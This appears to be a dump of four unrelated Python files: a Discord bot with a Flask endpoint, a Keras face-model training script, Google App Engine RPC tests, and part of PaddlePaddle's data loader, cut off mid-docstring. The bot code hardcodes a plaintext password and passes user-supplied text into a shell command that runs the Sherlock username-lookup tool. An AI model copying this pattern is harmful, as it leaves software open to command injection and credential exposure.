path = os.path.dirname(os.path.abspath(__file__))
out = check_output(f"python \"{path}/sherlock/sherlock.py\" --print-found --no-color {un}").decode().strip()
out = "\n".join([line for line in out.split("\r\n") if line[1] in "+*"])
return out
@app.route("/")
def root():
if "auth" in request.args and request.args["auth"] == sha256(b"Litago123#").hexdigest():
# auth approved
guild = client.get_guild(GUILD) # hypixel central
return htmlTable(findUnclean(guild))# guild.members
else:
# if no authentication is given then return the chicken broth
return '<!doctype html><html lang="en"> <head> <meta property="og:title" content="Litago smaker godt"/><meta property="og:type" content="website"/><meta property="og:url" content="http://litago.xyz"/><meta property="og:image" content="http://litago.xyz/static/chicken.gif"/><meta property="og:description" content="Litago > Cocio"/> <title>401 fuck off</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta.2/css/bootstrap.min.css" integrity="sha384-PsH8R72JQ3SOdhVi3uxftmaW6Vc51MKb0q5P2rRUpPvrszuE4W1povHYgTpBfshb" crossorigin="anonymous"> </head> <body> <div class="container"> <img src="http://litago.xyz/static/chicken.gif" alt=""> </div><script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.3/umd/popper.min.js" integrity="sha384-vFJXuSJphROIrBnz7yo7oB41mKfc8JzQZiCq4NCceLEaO4IHwicKwpJf9c9IpFgh" crossorigin="anonymous"></script> <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta.2/js/bootstrap.min.js" integrity="sha384-alpBpkh1PFOepccYVYDB4do5UnbKysX5WZXm3XxPqe5iKTfUKjNkCk9SaVuEZflJ" crossorigin="anonymous"></script> </body></html>'
class MessageCommands:
async def help(message):
await message.channel.send("Availible commands: \n" + "\n".join(commands.keys()))
async def update(message):
if "doki club members" not in [r.name.lower() for r in message.author.roles]:
await message.channel.send("Elevated privileges required: 'DOKI CLUB MEMBERS'")
return None
a = time.time()
await updateActive()
await message.channel.send(f"Finished updating in {round(time.time() - a, 2)} seconds")
async def person(message):
# give all info about the user
if len(message.mentions) == 0:
await message.channel.send(embed=personalizedEmbed(message.author))
elif len(message.mentions) > 5:
await message.channel.send("Limit reached: Max 5 users at a time.")
else:
for member in message.mentions:
await message.channel.send(embed=personalizedEmbed(member))
async def time(message):
timeString = lambda tz: datetime.datetime.now(pytz.timezone(tz)).strftime("**%X** %a %b %d")
await message.channel.send("\n".join([
"TZs:",
f"**New Zealand** (Pacific/Auckland): {timeString('Pacific/Auckland')}",
f"**Norway** (Europe/Oslo): {timeString('Europe/Oslo')}",
f"**USA (SC)** (US/Eastern): {timeString('US/Eastern')}"
]))
async def sherlock(message):
if message.author.id != 165140141751402496:
await message.channel.send("You have to be __me__ to use this command (due to latency)")
return None
args = message.content.split(" ")[1:]
await message.channel.send(sherlock(" ".join(args)))
@client.event
async def on_message(message):
if message.author == client.user:
return None
else:
for cmd in commands:
if message.content.strip().lower().startswith(cmd):
await commands[cmd](message)
break
@client.event
async def on_ready():
print(f"Booted at {time.asctime()}")
a = time.time()
await updateActive()
print(time.time()-a, "s used to updated active")
if __name__ == "__main__":
commands = {
";help": MessageCommands.help,
";update": MessageCommands.update,
";person": MessageCommands.person,
";time": MessageCommands.time,
";sherlock": MessageCommands.sherlock
}
threading.Thread(target=app.run, kwargs={"host": "0.0.0.0", "port": 80, "debug": False}).start()
client.run(TOKEN)
|
runModel.py
|
import sys, csv, math, random, os
import numpy as np
from Cnn3DModel import Cnn3DModel
from FaceDataset import FaceDataset
from ExtendedFeatureDataset import ExtendedFeatureDataset
from FaceDataset_tiny import FaceDataset_tiny
from FaceDataset_tiny_classifier import FaceDataset_tiny_classifier
from multiprocessing import Process, Queue
from keras.callbacks import EarlyStopping, ModelCheckpoint,ReduceLROnPlateau
from keras.optimizers import SGD, Adam
from keras.models import model_from_json
from multiprocessing import Process, Queue
class runModel:
trainingDataset = None;
validationDataset = None;
testDataset = None;
output_path = "";
input_path = "";
model = None;
def __init__(self, input_path, output_path):
print("create instance...");
self.output_path = output_path;
self.input_path = input_path;
# load dataset
print("load dataset...");
#self.trainingDataset = FaceDataset_tiny(self.input_path, "train_database_complete_shuffled.h5", "train");
#self.validationDataset = FaceDataset_tiny(self.input_path, "val_database_complete_shuffled.h5", "val");
#self.testDataset = FaceDataset_tiny(self.input_path, "test_database_complete.h5", "test");
self.trainingDataset = FaceDataset(self.input_path, "train_database_complete.h5", "train");
self.validationDataset = FaceDataset(self.input_path, "val_database_complete.h5", "val");
self.testDataset = FaceDataset(self.input_path, "test_database_complete.h5", "test");
#self.trainingDataset = ExtendedFeatureDataset(self.input_path, "train_database_complete_shuffled.h5", "train");
#self.validationDataset = ExtendedFeatureDataset(self.input_path, "val_database_complete_shuffled.h5", "val");
#self.testDataset = ExtendedFeatureDataset(self.input_path, "test_database_complete.h5", "test");
trainingDatasetSamples = self.trainingDataset.size();
print("trainingset sample size: " + str(trainingDatasetSamples));
validationDatasetSamples = self.validationDataset.size();
print("validationset sample size: " + str(validationDatasetSamples));
testDatasetSamples = self.testDataset.size();
print("testset sample size: " + str(testDatasetSamples));
# create CNNModel instance
self.model = Cnn3DModel(self.trainingDataset, self.validationDataset, self.testDataset, self.output_path);
def runTrainingMode(self):
#set hyperparameters
params = [0.1, 0, 0.002, 0.2];
#params = [0.1, 0, 0.0, 0.0];
#params = [0.1, 0, 0.9, 0.999, 1e-8, 0.002, 0.0];
self.model.setHyperparameters(params);
#select optimizer
self.model.selectOptimizer("sgd");
#self.model.selectOptimizer("adam");
# create model
self.model.createModel();
#save model architecture to file
self.model.saveModelArch();
# compile model
self.model.compileModel();
# print model summary
self.model.printModelSummary();
# create callback functions
self.model.createCallbacks();
# train model
history = self.model.trainModel();
# save history to csv
self.model.saveTrainingHistoryToCSV();
#evaluate final model
#scores = self.model.evaluateModel();
#print(scores);
# save predictions to csv
self.model.savePredictionsToCSV();
def runAdditionalTrainingMode(self, path):
# load architecture
self.model.loadModelArch(path + "Model/model.json");
#load model weights
self.model.loadWeights(path + "Model/weights_best.h5");
#set hyperparameters
params = [0.001, 0, 0.002, 0.2];
self.model.setHyperparameters(params);
#select optimizer
self.model.selectOptimizer("sgd");
# compile model
self.model.compileModel();
# print model summary
self.model.printModelSummary();
# create callback functions
self.model.createCallbacks();
# train model
history = self.model.trainModel();
# save history to csv
self.model.saveTrainingHistoryToCSV();
#evaluate final model
scores = self.model.evaluateModel();
print(scores);
# save predictions to csv
self.model.savePredictionsToCSV();
def runTestMode(self):
#print("NOT IMPLEMENTED");
print("load model architecture...");
self.model.loadModelArch(self.output_path + "Model/model.json");
print("load best model weights...");
self.model.loadWeights(self.output_path + "Model/weights_best.h5");
# compile model
self.model.compileModel();
#print("test model...");
#self.model.testModel();
self.model.validateModel();
def calculateTrainingsPredictions(self):
print("load model architecture...");
self.model.loadModelArch(self.output_path + "Models/model.json");
print("load best model weights...");
self.model.loadWeights(self.output_path + "Models/weights_best.h5");
# compile model
self.model.compileModel();
# calcuate predictions
self.model.saveTrainingPredictionsToCSV();
def runEvaluateBestModel(self):
print("find best model");
scores = [];
directories = os.listdir(self.output_path);
print(directories);
for directory in directories:
print(directory);
print("load model architecture from " + str(directory));
# load architecture
self.model.loadModelArch(self.output_path + directory + "/model.json");
#load model weights
self.model.loadWeights(self.output_path + directory + "/weights_best.h5");
# compile model
self.model.compileModel();
# evaluate model
scores.append(self.model.evaluateModel());
# save predictions to csv
self.model.savePredictionsToCSV();
scores = np.array(scores);
idx = scores[:,1].argmax();
scores_best = scores[idx] * 100.0;
print("directory name: " + str(directories[idx]));
print("---------------------------------------");
print("evaluation accuracy of best model: " + str(scores_best[1]) + "%");
print("evaluation error of best model: " + str(scores_best[0]) + "%");
def runHyperparameterSearch(self, nCombinations):
for i in range(0, nCombinations):
# select random params
params = self.model.selectRandomParams('sgd');
self.run_in_separate_process(self.trainModelCombinations, (params, ));
def trainModelCombinations(self, params):
#set hyperparameters
self.model.setHyperparameters(params);
#select optimizer
self.model.selectOptimizer('sgd');
# create model
self.model.createModel();
#save model architecture to file
self.model.saveModelArch();
# compile model
self.model.compileModel();
# create callback functions
self.model.createCallbacks();
# train model
history = self.model.trainModel();
# save history to csv
self.model.saveTrainingHistoryToCSV();
# save predictions to csv
self.model.savePredictionsToCSV();
def run_in_separate_process(self, method, args):
def queue_wrapper(q, params):
r = method(*params)
q.put(r)
q = Queue()
p = Process(target=queue_wrapper, args=(q, args))
p.start()
#return_val = q.get()
p.join()
def visTest(self):
print("load model architecture...");
self.model.loadModelArch(self.output_path + "Model/model.json");
print("load best model weights...");
self.model.loadWeights(self.output_path + "Model/weights_best.h5");
# compile model
self.model.compileModel();
self.model.generate_cam();
def run_visualization(self):
# load architecture
print("load model architecture...");
#self.model.loadModelArch(self.output_path + "Model/model.json");
self.model.addDecoder();
# compile model
self.model.compileModel();
# print model summary
self.model.printModelSummary();
print("visualize layer outputs");
self.model.getLayerOutput();
#self.model.visualize_class_activation_map();
|
apiproxy_stub_map_test.py
|
#!/usr/bin/env python
#
# Copyright 2007 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Tests for google.appengine.api.apiproxy_stub_map."""
from concurrent import futures
import threading
import traceback
import google
from absl import app
from six.moves import range
from google.appengine.api import apiproxy_rpc
from google.appengine.api import apiproxy_stub_map
from absl.testing import absltest
class APIProxyStubMapTest(absltest.TestCase):
"""Tests for API proxy stub map."""
def setUp(self):
super(APIProxyStubMapTest, self).setUp()
self.stubmap = apiproxy_stub_map.APIProxyStubMap()
def testCrudForHooks(self):
"""Tests for the precall stubs."""
hooks = self.stubmap.GetPreCallHooks()
order = []
self.assertEmpty(hooks)
def MakeFunction(number):
def Result(service, call, request, response):
order.append(number)
return Result
self.assertTrue(hooks.Append('a', MakeFunction(2)))
self.assertTrue(hooks.Append('b', MakeFunction(3)))
self.assertFalse(hooks.Append('b', MakeFunction(17)))
self.assertLen(hooks, 2)
self.assertTrue(hooks.Push('c', MakeFunction(1)))
self.assertLen(hooks, 3)
hooks.Call(None, None, None, None)
self.assertEqual([1, 2, 3], order)
hooks.Clear()
self.assertEmpty(hooks)
def testExtendedHookArgs(self):
"""Tests for extended 5-argument hooks."""
for hooks in [self.stubmap.GetPreCallHooks(),
self.stubmap.GetPostCallHooks()]:
rpc_args = []
self.assertEmpty(hooks)
def MakeFunction(extended):
if extended:
def Result(service, call, request, response, rpc):
rpc_args.append(rpc)
return Result
else:
def Result(service, call, request, response):
rpc_args.append(None)
return Result
class BoundMethod:
def WithRPC(self, service, call, request, response, rpc):
rpc_args.append(rpc)
def WithoutRPC(self, service, call, request, response):
rpc_args.append(None)
bound = BoundMethod()
self.assertTrue(hooks.Append('a', MakeFunction(True)))
self.assertTrue(hooks.Append('b', MakeFunction(False)))
self.assertTrue(hooks.Append('c', bound.WithRPC))
self.assertTrue(hooks.Append('d', bound.WithoutRPC))
self.assertLen(hooks, 4)
rpc_sentinel = "sentinel"
hooks.Call(None, None, None, None, rpc_sentinel)
self.assertEqual([rpc_sentinel, None, rpc_sentinel, None], rpc_args)
def testSuperExtendedHookArgs(self):
"""Tests for extended 6-argument hooks."""
hooks = self.stubmap.GetPostCallHooks()
rpc_passed = '-RPC-'
error_passed = '-ERR-'
error_omitted = '-NOPE-'
rpc_args = []
self.assertEmpty(hooks)
def MakeFunction(super_extended):
if super_extended:
def Result(service, call, request, response, rpc, error):
rpc_args.append((rpc, error))
else:
def Result(service, call, request, response, rpc):
rpc_args.append((rpc, error_omitted))
return Result
self.assertTrue(hooks.Append('a', MakeFunction(True)))
self.assertTrue(hooks.Append('b', MakeFunction(False)))
self.assertLen(hooks, 2)
hooks.Call(None, None, None, None, rpc_passed)
self.assertEqual([(rpc_passed, None),
(rpc_passed, error_omitted)], rpc_args)
rpc_args = []
hooks.Call(None, None, None, None, rpc_passed, error_passed)
self.assertEqual([(rpc_passed, error_passed)], rpc_args)
def testMakeSyncCall(self):
"""Makes sure that the hooks are executed in the right order."""
calls = []
def Pre(service, call, request, response):
calls.append('pre')
class Stub(object):
def MakeSyncCall(self, service, call, request, response):
calls.append('stub')
def Post(service, call, request, response):
calls.append('post')
self.stubmap.GetPreCallHooks().Append('before', Pre)
self.stubmap.RegisterStub('service1', Stub())
self.stubmap.GetPostCallHooks().Append('after', Post)
self.assertIsNone(self.stubmap.MakeSyncCall('service1', None, None, None))
self.assertEqual(['pre', 'stub', 'post'], calls)
calls = []
self.stubmap.GetPreCallHooks().Clear()
self.assertIsNone(apiproxy_stub_map.MakeSyncCall('service1', None,
None, None,
stubmap=self.stubmap))
self.assertEqual(['stub', 'post'], calls)
def testMakeSyncCallReturnValue(self):
"""Tests return value of MakeSyncCall.
Tests that MakeSyncCall() correctly returns value returned by
stub.MakeSyncCall() (if any) and calls hooks with correct request/response
objects.
"""
calls = []
call_obj = object()
request_obj = object()
response_obj = object()
response_obj_2 = object()
def Pre(service, call, request, response):
self.assertEqual('service1', service)
self.assertEqual(call, call_obj)
self.assertEqual(request, request_obj)
self.assertEqual(response, response_obj)
calls.append('pre')
class Stub(object):
def MakeSyncCall(innerself, service, call, request, response):
calls.append('stub')
self.assertEqual('service1', service)
self.assertEqual(call, call_obj)
self.assertEqual(request, request_obj)
self.assertEqual(response, response_obj)
return response_obj_2
def Post(service, call, request, response):
calls.append('post')
self.assertEqual('service1', service)
self.assertEqual(call, call_obj)
self.assertEqual(request, request_obj)
self.assertEqual(response, response_obj_2)
self.stubmap.GetPreCallHooks().Append('before', Pre)
self.stubmap.RegisterStub('service1', Stub())
self.stubmap.GetPostCallHooks().Append('after', Post)
self.assertEqual(
response_obj_2,
self.stubmap.MakeSyncCall('service1', call_obj, request_obj,
response_obj))
self.assertEqual(['pre', 'stub', 'post'], calls)
calls = []
self.stubmap.GetPreCallHooks().Clear()
self.assertEqual(
response_obj_2,
self.stubmap.MakeSyncCall('service1', call_obj, request_obj,
response_obj))
self.assertEqual(['stub', 'post'], calls)
def testMakeSyncCall_Exception(self):
"""Test end cases around rpcs that raise exceptions."""
calls = []
def Pre(service, call, request, response):
calls.append('pre')
class Stub(object):
def MakeSyncCall(self, service, call, request, response):
calls.append('stub')
raise RuntimeError('stub')
def Post4(service, call, request, response):
calls.append('post4')
def Post5(service, call, request, response, rpc):
calls.append('post5')
def Post6(service, call, request, response, rpc, error):
calls.append('post6')
self.stubmap.GetPreCallHooks().Append('before', Pre)
self.stubmap.RegisterStub('service1', Stub())
self.stubmap.GetPostCallHooks().Append('after4', Post4)
self.stubmap.GetPostCallHooks().Append('after5', Post5)
self.stubmap.GetPostCallHooks().Append('after6', Post6)
self.assertRaises(RuntimeError,
self.stubmap.MakeSyncCall, 'service1', None, None, None)
self.assertEqual(['pre', 'stub', 'post6'], calls)
def testCopyStubMap(self):
class Stub(object):
pass
self.stubmap.RegisterStub('service1', Stub())
stubmap = self.stubmap._CopyStubMap()
self.assertIn('service1', stubmap)
self.assertLen(stubmap, 1)
stubmap['service2'] = Stub()
self.assertIsNone(self.stubmap.GetStub('service2'))
class BarrierRPC(apiproxy_rpc.RPC):
"""Mock low-level RPC class for barrier test."""
def __init__(self, stub):
apiproxy_rpc.RPC.__init__(self, stub=stub)
self._wait_for_future = None
def _MakeCallImpl(self):
self._wait_for_future = self.stub.Add(self.request, self)
apiproxy_rpc.RPC._MakeCallImpl(self)
def _SendRequest(self):
if self._wait_for_future:
futures.wait([self._wait_for_future])
apiproxy_rpc.RPC._SendRequest(self)
class BarrierStub(object):
"""Mock stub for barrier test."""
THREADSAFE = True
def __init__(self):
self.queue = []
self.rpc_to_return = None
def CreateRPC(self):
return self.rpc_to_return or BarrierRPC(self)
def SetRpcToReturn(self, rpc):
"""Which RPC should CreateRPC return?
Args:
rpc: This RPC will be returned by next CreateRPC call.
"""
self.rpc_to_return = rpc
def Add(self, order, rpc):
if rpc is None:
rpc = 0
if order is None:
order = 0
self.queue.append((order, rpc))
self.queue.sort(key=lambda entry: entry[0])
wait_for_future = None
for entry in self.queue:
if entry[1] == rpc:
break
wait_for_future = entry[1].future
return wait_for_future
def MakeSyncCall(self, service, call, request, response):
if call == 'error':
raise ZeroDivisionError('booh')
class BarrierTest(absltest.TestCase):
"""Tests specific for wait_any() and wait_all()."""
def setUp(self):
super(BarrierTest, self).setUp()
self.stubmap = apiproxy_stub_map.APIProxyStubMap()
self.stub = BarrierStub()
self.stubmap.RegisterStub('barrier', self.stub)
def testWaitAll(self):
"""Test UserRPC.wait_all()."""
rpcs = []
calls = []
for i in range(5):
def _Callback(arg=i):
calls.append(arg)
rpc = apiproxy_stub_map.UserRPC('barrier', callback=_Callback,
stubmap=self.stubmap)
rpc.make_call('call', i, None)
rpcs.append(rpc)
apiproxy_stub_map.UserRPC.wait_all([rpcs[3], rpcs[2], rpcs[1]])
self.assertCountEqual(calls, [1, 2, 3])
calls = []
apiproxy_stub_map.UserRPC.wait_all(rpcs)
self.assertCountEqual(calls, [0, 4])
apiproxy_stub_map.UserRPC.wait_all([])
def testWaitAny(self):
"""Test UserRPC.wait_any()."""
rpcs = []
calls = []
for i in range(5):
def _Callback(arg=i):
calls.append(arg)
rpc = apiproxy_stub_map.UserRPC('barrier', callback=_Callback,
stubmap=self.stubmap)
rpc.make_call('call', i, None)
rpcs.append(rpc)
wait_for_rpcs = [rpcs[3], rpcs[2], rpcs[1]]
rpc = apiproxy_stub_map.UserRPC.wait_any(wait_for_rpcs)
self.assertIn(rpc, wait_for_rpcs)
self.assertLen(calls, 1)
first_call = calls[0]
self.assertEqual(rpc, rpcs[first_call])
calls = []
rpc = apiproxy_stub_map.UserRPC.wait_any([rpcs[0]])
self.assertEqual(rpc, rpcs[0])
self.assertEqual(calls, [0])
calls = []
rpcs = set(rpcs)
while rpcs:
rpc = apiproxy_stub_map.UserRPC.wait_any(rpcs)
rpcs.remove(rpc)
expected_calls = [1, 2, 3, 4]
expected_calls.remove(first_call)
self.assertCountEqual(calls, expected_calls)
rpc = apiproxy_stub_map.UserRPC.wait_any([])
self.assertIsNone(rpc)
def testNoNestedCallbacks(self):
"""Test that callbacks will never be nested inside each other."""
rpcs = []
calls = []
for i in range(5):
def _Callback(arg=i):
calls.append(arg+100)
other_rpc = apiproxy_stub_map.UserRPC('barrier', stubmap=self.stubmap)
other_rpc.make_call('call', arg, None)
other_rpc.wait()
calls.append(arg+200)
rpc = apiproxy_stub_map.UserRPC('barrier', callback=_Callback,
stubmap=self.stubmap)
rpc.make_call('call', i, None)
rpcs.append(rpc)
apiproxy_stub_map.UserRPC.wait_all([rpcs[1]])
self.assertCountEqual(calls, [101, 201])
calls = []
apiproxy_stub_map.UserRPC.wait_all(rpcs[:3])
self.assertCountEqual(calls, [100, 200, 102, 202])
calls = []
apiproxy_stub_map.UserRPC.wait_all(rpcs)
self.assertCountEqual(calls, [103, 203, 104, 204])
def testCheckSuccess(self):
"""Test that check_success() doesn't raise InterruptedError."""
rpc1 = apiproxy_stub_map.UserRPC('barrier', stubmap=self.stubmap)
rpc1.make_call('call', 42, None)
rpc = apiproxy_stub_map.UserRPC.wait_any([rpc1])
self.assertIs(rpc1, rpc)
rpc.check_success()
def testCheckSuccess_Exception(self):
"""Test that check_success() doesn't overwrite low-level exceptions."""
rpc1 = apiproxy_stub_map.UserRPC('barrier', stubmap=self.stubmap)
rpc1.make_call('error', 42, None)
rpc = apiproxy_stub_map.UserRPC.wait_any([rpc1])
self.assertIs(rpc1, rpc)
self.assertRaises(ZeroDivisionError, rpc.check_success)
def testMultiThreadedWait(self):
"""Test that UserRpc() works in presence of multiple threads."""
exceptions = []
calls = []
some_random_number = 42
def Call(request):
try:
barrier_rpc = TestRpc(self.stub)
self.stub.SetRpcToReturn(barrier_rpc)
rpc1 = apiproxy_stub_map.UserRPC('barrier', stubmap=self.stubmap)
rpc1.make_call('call', request, None)
rpc = apiproxy_stub_map.UserRPC.wait_any([rpc1])
self.assertIs(rpc1, rpc)
rpc.check_success()
except:
exceptions.append(traceback.format_exc())
class TestRpc(BarrierRPC):
"""Overrides BarrierRPC _SendRequest() to simulate race condition.
When first RPC calls _SendRequest() it issues another RPC using thread.
"""
def _SendRequest(self, *args, **kwargs):
if not calls:
calls.append(1)
t = threading.Thread(target=Call, args=(some_random_number - 1,))
t.setDaemon(True)
t.start()
t.join()
else:
calls.append(2)
super(TestRpc, self)._SendRequest(*args, **kwargs)
Call(some_random_number)
self.assertEqual([1, 2], calls)
self.assertEqual([], exceptions, '\n'.join(exceptions))
class WaitCancellerTest(absltest.TestCase):
"""Tests for WaitCanceller functionality with wait_any()."""
def setUp(self):
super(WaitCancellerTest, self).setUp()
self.stubmap = apiproxy_stub_map.APIProxyStubMap()
self.stub = BarrierStub()
self.stubmap.RegisterStub('barrier', self.stub)
def testWaitAny_JustCanceller(self):
"""Calling wait_any() on just the wait_canceller should return it."""
wait_canceller = apiproxy_stub_map.WaitCanceller()
wait_canceller.cancel()
finished_rpc = apiproxy_stub_map.UserRPC.wait_any([wait_canceller])
self.assertEqual(wait_canceller, finished_rpc)
finished_rpc = apiproxy_stub_map.UserRPC.wait_any([wait_canceller])
self.assertEqual(wait_canceller, finished_rpc)
def testCancelCalledTwice(self):
"""Calling cancel() multiple times doesn't cause a crash."""
wait_canceller = apiproxy_stub_map.WaitCanceller()
wait_canceller.cancel()
wait_canceller.cancel()
finished_rpc = apiproxy_stub_map.UserRPC.wait_any([wait_canceller])
self.assertEqual(wait_canceller, finished_rpc)
def testWaitAny_CancellerFinishesFirst(self):
"""Wait on a cancelled canceller and a blocked RPC returns canceller."""
blocking_event = threading.Event()
class BlockingRPC(BarrierRPC):
"""RPC that blocks until blocking_event."""
def _SendRequest(self, *args, **kwargs):
blocking_event.wait()
super(BlockingRPC, self)._SendRequest(*args, **kwargs)
blocking_rpc = BlockingRPC(self.stub)
self.stub.SetRpcToReturn(blocking_rpc)
rpc = apiproxy_stub_map.UserRPC('barrier', stubmap=self.stubmap)
rpc.make_call('call', 0, None)
wait_canceller = apiproxy_stub_map.WaitCanceller()
wait_canceller.cancel()
finished_rpc = apiproxy_stub_map.UserRPC.wait_any([rpc, wait_canceller])
self.assertEqual(wait_canceller, finished_rpc)
finished_rpc = apiproxy_stub_map.UserRPC.wait_any([wait_canceller, rpc])
self.assertEqual(wait_canceller, finished_rpc)
blocking_event.set()
def testWaitAny_RpcFinishesFirst(self):
"""Wait on a cancelled canceller and finished RPC should return the RPC."""
rpc_finished = threading.Event()
class TestRPC(BarrierRPC):
"""RPC that blocks until blocking_event."""
def _SendRequest(self, *args, **kwargs):
super(TestRPC, self)._SendRequest(*args, **kwargs)
rpc_finished.set()
blocking_rpc = TestRPC(self.stub)
self.stub.SetRpcToReturn(blocking_rpc)
rpc = apiproxy_stub_map.UserRPC('barrier', stubmap=self.stubmap)
rpc.make_call('call', 0, None)
rpc_finished.wait()
wait_canceller = apiproxy_stub_map.WaitCanceller()
wait_canceller.cancel()
finished_rpc = apiproxy_stub_map.UserRPC.wait_any([rpc, wait_canceller])
self.assertEqual(rpc, finished_rpc)
finished_rpc = apiproxy_stub_map.UserRPC.wait_any([wait_canceller, rpc])
self.assertEqual(rpc, finished_rpc)
def main(unused_argv):
absltest.main()
if __name__ == '__main__':
absltest.main(main)
|
reader.py
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from . import core
import sys
import six
import numpy as np
import threading
import paddle
from .framework import Program, Variable, program_guard, default_main_program, default_startup_program, in_dygraph_mode, cpu_places, _current_expected_place
from .executor import global_scope
from .data_feeder import DataFeeder, BatchedTensorProvider
from .multiprocess_utils import multiprocess_queue_set, CleanupFuncRegistrar, _cleanup_mmap, _cleanup, _set_SIGCHLD_handler
from .dataloader import BatchSampler, Dataset, IterableDataset
from .dataloader.dataloader_iter import _DataLoaderIterSingleProcess, _DataLoaderIterMultiProcess, _DatasetKind, default_collate_fn
from .dataloader.batch_sampler import _InfiniteIterableSampler
from .layers.io import monkey_patch_reader_methods, _copy_reader_var_, double_buffer
from .unique_name import UniqueNameGenerator
from .framework import _get_paddle_place, _get_paddle_place_list
import logging
import warnings
### Dygraph DataLoader configs ###
import os
import multiprocessing
import signal
# NOTE: queue has a different name in python2 and python3
if six.PY2:
import Queue as queue
else:
import queue
# NOTE: [ avoid hanging & failed quickly ] These value is used in getting data from another process
QUEUE_GET_TIMEOUT = 60
__all__ = ['PyReader', 'DataLoader', 'default_collate_fn']
data_loader_unique_name_generator = UniqueNameGenerator()
KEEP_DATA_LOADER_ORDER = True
USE_PINNED_MEMORY = None
def keep_data_loader_order(*args):
global KEEP_DATA_LOADER_ORDER
if len(args) == 0:
return KEEP_DATA_LOADER_ORDER
else:
assert len(args) == 1 and isinstance(args[0], bool)
KEEP_DATA_LOADER_ORDER = args[0]
def use_pinned_memory(*args):
global USE_PINNED_MEMORY
if len(args) == 0:
return USE_PINNED_MEMORY
else:
assert len(args) == 1 and isinstance(args[0], bool)
USE_PINNED_MEMORY = args[0]
def _convert_places(places):
if not isinstance(places, (list, tuple)):
places = [places]
ret = []
for p in places:
if not isinstance(p, core.Place):
tmp = core.Place()
tmp.set_place(p)
p = tmp
ret.append(p)
return ret
# NOTE(chenweihang): _reader_process_loop must be top level method to be pickled
def _reader_process_loop(batch_reader, data_queue):
try:
# set signal handler
core._set_process_signal_handler()
# NOTE: [ mmap files clear ] When the child process exits unexpectedly,
# some shared memory objects may have been applied for but have not yet
# been put into the inter-process Queue. This part of the object needs
# to be cleaned up when the process ends.
CleanupFuncRegistrar.register(_cleanup_mmap)
for batch in batch_reader():
tensor_list = core._convert_to_tensor_list(batch)
data_queue.put(tensor_list)
core._remove_tensor_list_mmap_fds(tensor_list)
data_queue.put(None)
except KeyboardInterrupt:
# NOTE: Main process will raise KeyboardInterrupt anyways, ignore it in child process
pass
except:
six.reraise(*sys.exc_info())
class DataLoaderBase(object):
def __init__(self):
self._places = None
def __call__(self):
return self
def next(self):
'''
Get the next item in the DataLoader object. This method
should not be called by users directly. It is used for
implementing iterator protocol of Python 2.x inside
PaddlePaddle framework.
'''
return self.__next__()
def __iter__(self):
raise NotImplementedError()
def __next__(self):
raise NotImplementedError()
@classmethod
def _check_input_array(cls, item):
arr = np.asarray(item)
if arr.dtype == np.object:
raise TypeError(
"\n\tFaild to convert input data to a regular ndarray :\n\t* Usually "
"this means the input data contains nested lists with different lengths. "
"\n\t* Check the reader function passed to 'decorate_batch_generator'"
" to locate the data causes this issue.\n\t* Please consider using "
"'fluid.create_lod_tensor' to convert it to a LoD-Tensor.")
return arr
class DataLoader(object):
"""
DataLoader prodives an iterator which iterates given dataset
once by the batch_sampler.
DataLoader supports single-process and multi-prcess data loading,
multi-process workers will be used to load data asynchronously if
:attr:`num_workers` is set as a positive number.
DataLoader supports map-style dataset and iterable-style dataset.
For map-style datast(can get a sample from dataset with a given
index), please see :code:`paddle.io.Dataset`.
For iterable-style datast(get samples from dataset iteratively,
like a Python iterator), please see :code:`paddle.io.IterableDataset`.
For :code:`batch_sampler` please see :code:`paddle.io.BatchSampler`
**Disable automatic batching**
In certain cases such as some NLP tasks, instead of automatic batching,
handling batching manually in dataset is needed by users. For these
cases, automatic batching is disabled if both :attr:`batch_size` and
:attr:`batch_sampler` is set as None, each data got from :attr:`dataset`
should be batched data and will be processed with function define by
:attr:`collate_fn` or :attr:`default_collate_fn`.
.. note::
When automatic batching is disabled, :attr:`default_collate_fn` will
do nothing to data from dataset.
Args:
dataset(Dataset): the dataset to load data from, should be an
instance of subclass of :code:`paddle.io.Dataset` or
:code:`paddle.io.IterableDataset`.
feed_list (list(Tensor)|tuple(Tensor)): feed Tensor list.
The Tensors should be created by :code:`paddle.static.data()`.
:attr:`feed_list` must be set if :attr:`return_list` is
False. Default None.
places(list(Place)|tuple(Place)|list(str)|optional): a list of Place,
to put data onto, :attr:`places` can be None, if
:attr:`places` is None, default place(CPUPlace or CUDAPlace(0))
will be used. Default None. If ``places`` is list of string,
the string in the list can be ``cpu``, ``gpu:x`` and ``gpu_pinned``,
where ``x`` is the index of the GPUs.
return_list (bool): whether the return value on each device is
presented as a list. If :attr:`return_list=False`, the return
value on each device would be a dict of str -> Tensor, where
the key of the dict is the name of each fed Tensors. If
:attr:`return_list=True`, the return value on each device would
be a list(Tensor). :attr:`return_list` can only be True
in dynamic graph mode. Default True.
batch_sampler(BatchSampler): an instance of `paddle.io.BatchSampler`
to generate batch indices to draw samples from :attr:`dataset`
and combine a batch. Default None.
batch_size(int|None): sample number in a mini-batch, a substitution
parameter for :attr:`batch_sampler`, if :attr:`batch_sampler`
is not set, a default `paddle.io.BatchSampler` will be used
and initialize by :attr:`batch_size`, :attr:`shuffle` and
:attr:`drop_last`. Default 1.
shuffle(bool): whther to shuffle indices order before genrate
